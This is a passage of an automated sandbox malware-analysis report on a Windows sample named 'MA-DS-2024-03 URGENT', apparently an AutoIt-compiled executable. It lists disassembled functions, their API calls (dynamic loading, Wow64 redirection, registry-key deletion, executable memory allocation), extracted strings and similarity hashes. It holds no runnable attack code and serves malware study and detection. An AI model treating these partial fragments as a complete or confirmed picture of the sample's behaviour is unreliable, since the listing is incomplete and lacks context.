                                                        APIs
                                                        • _free.LIBCMT ref: 016B3189
                                                          • Part of subcall function 016B2096: HeapFree.KERNEL32(00000000,00000000,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?), ref: 016B20AC
                                                          • Part of subcall function 016B2096: GetLastError.KERNEL32(?,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?,?), ref: 016B20BE
                                                        • _free.LIBCMT ref: 016B319B
                                                        • _free.LIBCMT ref: 016B31AD
                                                        • _free.LIBCMT ref: 016B31BF
                                                        • _free.LIBCMT ref: 016B31D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 07bc52124b5541a0809fdbec7bee18ffccab860ca606c3fa5bbb133ff20342da
                                                        • Instruction ID: 3c369ff40bc2481d0b51e4506816dbf04d7e6e303d251b8b81cb1fe2897e6f17
                                                        • Opcode Fuzzy Hash: 07bc52124b5541a0809fdbec7bee18ffccab860ca606c3fa5bbb133ff20342da
                                                        • Instruction Fuzzy Hash: AFF01232A46201AB9634DA6CFDC5C9A7BEEBA04612B54180DF559D7705CB30F8D0CB64
                                                        Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 004013BF
                                                        • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                        • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                        • DeleteObject.GDI32 ref: 00401401
                                                        • StrokePath.GDI32(?), ref: 0040141C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                        • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                        • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                        • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                        Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                        • __swprintf.LIBCMT ref: 00412ECD
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: 47b1e74613fbc136e2545df492ee6b0930d33cf5f5d3911faf019498d72d6d6d
                                                        • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                        • Opcode Fuzzy Hash: 47b1e74613fbc136e2545df492ee6b0930d33cf5f5d3911faf019498d72d6d6d
                                                        • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                        Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container$%I
                                                        • API String ID: 3565006973-4251005282
                                                        • Opcode ID: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                                                        • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                        • Opcode Fuzzy Hash: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                                                        • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                        Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                          • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                        • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                        • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                        • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                        Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: 3cA$_A
                                                        • API String ID: 4104443479-3480954128
                                                        • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                        • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                        • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                        • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                        Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                        • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                        • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                        • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                        Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                        • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                        • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                        • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                        Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __calloc_crt
                                                        • String ID: K$@BL
                                                        • API String ID: 3494438863-2209178351
                                                        • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                        • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                        • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                        • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                        Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                        • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                        • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                        • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                        Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                        • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                        • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                        • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                        Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                        • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                        • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                        • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                        Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                        • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                        • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                        • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                        Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                        • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                        • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                        • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                        Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                        • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                          • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                        • _memmove.LIBCMT ref: 0047E314
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                        • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
